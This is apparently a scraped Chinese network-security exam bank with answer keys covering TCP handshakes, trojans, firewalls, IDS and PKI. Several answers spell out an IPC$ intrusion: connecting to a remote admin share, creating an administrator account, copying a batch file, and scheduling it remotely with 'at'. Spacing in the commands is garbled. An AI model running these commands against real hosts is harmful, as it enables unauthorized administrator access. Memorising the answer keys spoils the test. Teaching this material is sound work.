网络安全技术真题精选.docx
《网络安全技术真题精选.docx》由会员分享,可在线阅读,更多相关《网络安全技术真题精选.docx(21页珍藏版)》请在冰豆网上搜索。
网络安全技术真题精选
2019年网络安全技术真题精选
[单项选择题]
1、删除账号stu的命令是()(密码是123)。
A.netuser123stu
B.netuser123stu/del
C.netuse123stu/del
D.netuserstu123/del
参考答案:
B
[单项选择题]
2、netview命令查看的是()。
A.所有共享
B.特殊共享
C.默认共享
D.普通共享
参考答案:
D
[填空题]
3IPC攻击是黑客常用的攻击方式,但需要复杂的连接和操作控制,例如查看目标机的共享情况、建立帐号、留下后面程序等等,请回答ipc攻击的以下步骤操作?
1)建立空ipc$连接的命令。
2)在本机用netuser命令建立帐号:
s1,并加入administrators组的过程。
3)查看远程主机192.168.11.222的时间命令4)映射远程主机192.168.11.6主机上C盘为本机Z:
的命令5)写出删除本机ipc$的命令
参考答案:
①、netuse//192.168.11.1/ipc$“password”/user:
”admin”
②、netusers1123/add
netlocalgroupadministratorss1/add
③、nettime192.168.11.1
④、netusez:
//192.168.11.6/c$
⑤、netshareipc$/del
[单项选择题]
4、建立共享成功的必要条件条件是()。
A.开放server服务
B.开放Taskscheduler服务
C.开启Guest账号
D.开放远程管理服务
参考答案:
A
[填空题]
5下图是一台计算机访问一个Web网站时SNIFFER获取的数据包序列。
在TCP的6比特的控制字段中:
[SYN]的含义是()。
[SYN,ACK]的含义是()。
[ACK]的含义是()。
参考答案:
请求建立TCP连接;可以建立连接;确认
[单项选择题]
6、DDOS是()攻击。
A.远程攻击
B.分布式拒绝服务
C.请求拒绝
D.溢出攻击
参考答案:
B
[填空题]
7下图是一台计算机访问一个Web网站时SNIFFER获取的数据包序列。
客户机向服务器请求建立TCP连接的数据包的号数是()。
参考答案:
1
[单项选择题]
8、木马是采用()来控制远程机器的(c=Clients=Server)。
A.c控制s
B.s控制c
C.c控制c
D.s控制s
参考答案:
A
[填空题]
9下图是一台计算机访问一个Web网站时SNIFFER获取的数据包序列。
客户机访问服务器使用的传输层协议是(),应用层协议是()。
参考答案:
TCP;HTTP
[单项选择题]
10、木马是()软件。
A.远程控制
B.病毒软件
C.恶意软件
D.邮件
参考答案:
A
[填空题]
11下图是一台计算机访问一个Web网站时SNIFFER获取的数据包序列。
Web服务器的IP地址是(),它属于()地址。
参考答案:
202.203.208.32;公网
[单项选择题]
12、冰河是()木马。
A.第一代
B.第二代
C.第三代
D.第四代
参考答案:
B
[填空题]
13下图是一台计算机访问一个Web网站时SNIFFER获取的数据包序列。
客户机的IP地址是(),它属于()地址。
参考答案:
192.168.0.103;私网
[单项选择题]
14、灰鸽子是()木马。
A.第一代木马
B.第二代木马
C.第三代木马
D.第四代木马
参考答案:
C
[填空题]
15简述主动连接的过程。
参考答案:
①服务端开放监听端口,等待连接。
②客户端(控制端)发出建立连接请求
③服务端同意连接,成功建立连接
[单项选择题]
16、木马的最主要功能是()。
A.入侵
B.远程控制
C.伪装
D.隐蔽
参考答案:
B
[填空题]
17在本机用netuser命令建立帐号:
s1,并加入administrator组的过程。
参考答案:
netusers1123/add
netlocalgroupadministratorss1/add
[单项选择题]
18、widows操作系统和硬件信息存在在注册表的()。
A.HKEY_CLASSES_ROOT
B.HKEY_CURRENT_CONFIG
C.HKEY_CURRENT-USER
D.HKEY_LOCAL_MACHE
参考答案:
D
[填空题]
19将当前目录下hancker.bat文件拷贝到远程机器192.168.11.1里C盘的命令是什么?
参考答案:
copyhacker.bat//192.169.11.1/c$
[单项选择题]
20、要能够进行远程注册表攻击必须()。
A.开启目标机的service的服务
B.开启目标机的RemoteRegistyService服务
C.开启目标机的Server服务
D.开启目标机的RemoteRoutig服务
参考答案:
B
[填空题]
21下图第四步传输什么内容:
参考答案:
前三步是三次握手过程,第四步是请求的具体内容,比如网页,前三步是为第四步服务的。
更多内容请访问《睦霖题库》微信公众号
[单项选择题]
22、windows有一个自带的管理telnet工具,该工具是()
A.tlntadmn
B.telnet
C.instsrv
D.system32
参考答案:
A
[填空题]
23在校园的局域网中捕获到一个以太网帧,此帧的全部数据如下图所示.
此帧中封装的上层协议是()协议。
参考答案:
ARP
[单项选择题]
24、删除amdin$的命令是()。
A.netshareadmin$
B.netshareadmin$=c:
/windows/del
C.netshareadmin$/del
D.netuseadmin$/del
参考答案:
C
[填空题]
25在校园的局域网中捕获到一个以太网帧,此帧的全部数据如下图所示.
它的源IP地址是(),它属于()IP地址。
参考答案:
10.0.26.12;私网
[单项选择题]
26、创建d:
/sun共享的命令是()。
A.netsharesu=d:
/sun/unlimit
B.netusesu=d:
/sun/unlimit
C.netusersu=d:
/sun/unlimit
D.netsharesu=/sun/unlimit
参考答案:
A
[填空题]
27在校园的局域网中捕获到一个以太网帧,此帧的全部数据如下图所示.
此的源物理地址是()。
参考答案:
00:
16:
76:
0e:
b8:
76
[单项选择题]
28、建立账号stu的命令是()(密码是123)。
A.netuser123stu
B.netuser123stu/add
C.netuse123stu/add
D.netuserstu123/add
参考答案:
B
[填空题]
29在校园的局域网中捕获到一个以太网帧,此帧的全部数据如下图所示.
它的目的IP地址是(),它属于()地址。
参考答案:
10.0.26.1;单播
[单项选择题]
30、amdin$对应的目录是()(系统在D盘)。
A.d:
/windows/system32
B.d:
/windows
C.d:
/programfile
D.d:
/
参考答案:
B
[填空题]
31在校园的局域网中捕获到一个以太网帧,此帧的全部数据如下图所示.
此帧的目的物理地址是(),它属于()地址。
参考答案:
ff:
ff:
ff:
ff:
ff:
ff;广播
[单项选择题]
32、Sniffer是()。
A.扫描工具
B.嗅探工具
C.连接工具
D.搜索工具
参考答案:
B
[填空题]
33在校园的局域网中捕获到一个以太网帧,此帧的全部数据如下图所示.
此帧的用途和目的是什么?
参考答案:
地址解析协议的ARP查询。
[单项选择题]
34、下列不是WINDOWS默认共享()。
A.C$
B.IPC$
C.ADMIN$
D.WIN
参考答案:
D
[填空题]
35利用bat远程开启telnet服务。
参考答案:
①、建立ipc$连接,netuse//192.168.17.2/ipc$“123”/user:
”zhangsan”
②、编写bat文件tel.bat
netstarttelnet
③、copytel.bat//192.169.17.2/d$
④、nettime192.168.17.2(取得时间t)
⑤、at//192.168.17.2t+3d:
/tel.bat
注意:
这种方法开启的服务的启动方式不能为禁止
[填空题]
36列举防火墙的几个基本功能?
参考答案:
(1)隔离不同的网络,限制安全问题的扩散,对安全集中管理,简化了安全管理的复杂程度。
(2)防火墙可以方便地记录网络上的各种非法活动,监视网络的安全性,遇到紧急情况报警。
(3)防火墙可以作为部署NAT的地点,利用NAT技术,将有限的IP地址动态或静态地与内部的IP地址对应起来,用来缓解地址空间短缺的问题或者隐藏内部网络的结构。
(4)防火墙是审计和记录Internet使用费用的一个最佳地点。
(5)防火墙也可以作为IPSec的平台。
(6)内容控制功能。
根据数据内容进行控制,比如防火墙可以从电子邮件中过滤掉垃圾邮件,
(7)可以过滤掉内部用户访问外部服务的图片信息。
只有代理服务器和先进的过滤才能实现。
[填空题]
37解释反弹技术
参考答案:
①设置中间代理
②客户端(控制端)向中间代理注册本机的最新ip
③客户端开放监听端口,等待连接。
④服务端从中间代理取得控制端的最新ip地址,并发出建立连接请求,客户端同意连接,成功建立连接
[填空题]
38什么是IDS,它有哪些基本功能?
参考答案:
入侵检测系统IDS,它从计算机网络系统中的若干关键点收集信息,并分析这些信息,检查网络中是否有违反安全策略的行为和遭到袭击的迹象。
入侵检测被认为是防火墙之后的第二道安全闸门。
1)监测并分析用户和系统的活动,查找非法用户和合法用户的越权操作;
2)核查系统配置和漏洞并提示管理员修补漏洞;
3)评估系统关键资源和数据文件的完整性;
4)识别已知的攻击行为,统计分析异常行为;
5)操作系统日志管理,并识别违反安全策略的用户活动等。
[填空题]
39开启远程机器192.168.11.8上telnet服务的方法。
参考答案:
①建立ipc连接
②连接管理远程计算机即打开计算机管理→操作→连接到另一台计算机
③在服务栏下开启telnet服务,同时可以更改启动类型
[填空题]
40说一说木马的防治方法?
参考答案:
①安装反病毒软件。
时刻打开杀毒软件,大多数反病毒工具软件几乎都可检测到所有的特洛伊木马,但值得注意的是,应及时更新反病毒软件。
②安装特洛伊木马删除软件。
反病毒软件虽然能查出木马,但却不能将它从计算机上删除。
为此必须安装诸如TROJIAREMOVER之类的软件。
③建立个人防火墙。
当木马进入计算机时,防火墙可以对你进行有效保护。
④不要执行来历不明的软件和程序。
木马的服务端程序只有在被执行后才会生效。
通过网络下载的文件,QQ或MSN传输的文件,以及从别人那拷贝来的文件,对电子邮件附件在没有十足把握的情况下,千万不要将它打开。
最好是在运行它之前,先用反病毒软件对它进行检查。
[填空题]
41映射远程主机192.168.11.6主机上C盘为本机Z:
的命令。
参考答案:
netusez:
//192.168.11.6/c$。
[填空题]
42为什么说在PKI中采用公钥技术的关键是如何确认某个人真正的公钥?
如何确认?
参考答案:
信息的可认证性是信息安全的一个重要方面。
认证的目的有两个:
一个是验证信息发送者的真实性,确认他没有被冒充;另一个是验证信息的完整性,确认被验证的信息在传递或存储过程中没有被篡改、重组或延迟。
在认证体制中,通常存在一个可信的第三方,用于仲裁、颁发证书和管理某些机密信息。
公钥密码技术可以提供网络中信息安全的全面解决方案。
采用公钥技术的关键是如何确认某个人真正的公钥。
在PKI中,为了确保用户及他所持有密钥的正确性,公开密钥系统需要一个值得信赖而且独立的第三方机构充当认证中心(CA),来确认声称拥有公开密钥的人的真正身份。
要确认一个公共密钥,CA首先制作一张“数字证书”,它包含用户身份的部分信息及用户所持有的公开密钥,然后CA利用本身的私钥为数字证书加上数字签名。
任何想发放自己公钥的用户,可以去认证中心(CA)申请自己的证书。
CA中心在认证该人的真实身份后,颁发包含用户公钥的数字证书,它包含用户的真实身份、并证实用户公钥的有效期和作用范围(用于交换密钥还是数字签名)。
其他用户只要能验证证书是真实的,并且信任颁发证书的CA,就可以确认用户的公钥。
[填空题]
43在本机用netuser命令建立帐号:
s1,并加入administrator组的过程。
参考答案:
netusers1123/add
netlocalgroupadministratorss1/add
[填空题]
44简述三次握手的过程。
参考答案:
[填空题]
45用IPC$入侵方法在远程主机192.168.11.1上建立一个帐号为STU2,并加入administrators过程。
参考答案:
①、netuse//192.168.11.1/ipc$“password”/user:
”admin”
②、建立文件hacker.bat,其内容:
netusers1123/add
netlocalgroupadministratorsstu/add
③、copyhacker.bat//192.169.11.1/c$
④、nettime//192.168.11.1(取得时间t)
⑤、at//192.168.11.1t+3c:
/hacker.bat
[填空题]
46ping命令的结果一般根据网络和目标机器不同,而不同,以下三个图分别表示最常见的三种,请根据以下三图回答问题:
①、图一表示ping的结果如何?
②、图二最有可能是什么原因造成?
③、图三的原因有哪些?
参考答案:
①、图一表示目标机畅通。
②、图二最有可能是不在线、关机或根本没有这样的机器。
③、图三的原因有硬件损坏或本机没有到达路由。
[填空题]
47简述木马攻击的过程.
参考答案:
①配置生成服务端
②种植木马
③上线,一般由主动和自动上线两种
④控制操作,实现攻击者的意图
[填空题]
48简述NTLM的认证方式。
参考答案:
NTLM认证方式有:
0:
不使用NTLM身份验证。
1:
先尝试NTLM身份验证。
如果失败,再使用passwd。
2:
只使用NTLM身份验证。
[填空题]
49命令netusez:
//192.168.11.6/c$成功执行的结果是什么?
参考答案:
该命令的成功执行结果是在本地机器上多出一个盘符Z,Z盘实质上就是远程机器的C盘,在本地对Z盘的操作就等于对远程机器C盘的操作。
[填空题]
50写出将D盘下student目录共享的命令,共享名为stu。
参考答案:
Netsharestu=D:
/student/unlimited
[填空题]
51填写下表,写出下列服务的公认端口或功能描述:
参考答案:
[填空题]
52DDOS是()。
参考答案:
分布式拒绝服务
[填空题]
53跳板的含义是()。
参考答案:
木马攻击的中间机器
[填空题]
54灰鸽子采用自动上线时,可以实现外网控制外网、内网控制内网和()。
参考答案:
外网控制内网
[填空题]
55在远程机器192.168.1.23上把帐号stu加入administrators组的net完整命令是netlocalgroupstu()。
参考答案:
/add
[填空题]
56在本机用net工具建立帐号stu1完整命令是()stu1123/add(密码是123)。
参考答案:
netuser
[填空题]
57映射远程主机192.168.11.6C盘为本机Z盘的完整命令是netuse()//192.168.11.6/c$
参考答案:
z:
[填空题]
58windows系统自带的telnet服务可执行文件的完整路径是()。
参考答案:
c;/windows/system32/tlntsvr.exe
[填空题]
59彩衣的目的是()。
参考答案:
逃避杀毒软件的查杀
[填空题]
60命令()打开微软控制台。
参考答案:
mmc